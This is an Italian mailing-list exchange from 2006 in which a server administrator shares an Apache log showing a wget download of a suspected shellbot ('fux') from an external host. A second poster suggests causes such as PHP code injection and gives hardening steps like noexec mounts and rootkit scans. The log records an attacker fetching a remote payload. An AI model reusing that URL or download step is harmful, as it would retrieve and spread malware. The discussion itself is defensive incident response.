On gio, 2006-05-11 at 19:01 +0200, Filippo Biondi wrote:
> Salve cari,
>
> Faccio seguito al bel talk di venerdi' con queste inquietanti righe
> teste' trovate tra i log di apache2.
> (volevate un esempio pratico??...mannaggia!!)
>
> ----------------------------------------------------------------
> --23:59:59-- http://1115.org/.xpl/fux
> => `fux'
> Resolving 1115.org... 70.96.188.39
> Connecting to 1115.org[70.96.188.39]:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 17,341 [text/plain]
>
> 0K .......... ...... 100%
> 34.59 KB/s
>
> 00:00:00 (34.59 KB/s) - `fux' saved [17341/17341]
>
> ------------------------------------------------------------------
>
> Il sito in questione e' presente, e' presente anche la sottodirectory
> ".xpl" con, tra gli altri, il file "fux" che ad una prima lettura sembra
> essere uno shellbot.
> Non mi sembra che pero' il server abbia riportato danni, tutto e' su e
> parrebbe funzionante (spero altresi' che non abbia combinato danni a
> terzi).
>
> Ora mi chiedo:
>
> 1) Come cavolo e' riuscito a far fare quella request al mio webserver?
> Ed a far eseguire il file una volta scaricatolo.
> E' per caso dovuto all'azione di un altro script?
Probabilmente un software che permette injection-code (un bel forum in
php per caso, o mambo ? )
Ma tanto tu hai montato le /home in noexec, ed anche /tmp per sicurezza
(vero ?).
> 2) Puo' essere dovuto ad una mia cattiva configurazione di
> libapache2-mod-perl2 o di apache2 (|| $both || $something_else)
Uhm direi di no, se hai vhost potrebbe essere idea carina far un utente
per ogni vhost
Controlla i log, vedi se c'è altra schifezza in giro e fai un paio di
passate con rootkithunter e chrootkit.
E sopratutto vedi di riuscire a capire, magari facendo un giro sui
soliti siti, se ci sono vulnerabilità note sui programmi che girano sul
server (dovresti trovare qualcosa, sto script gira da molto)
Andy
|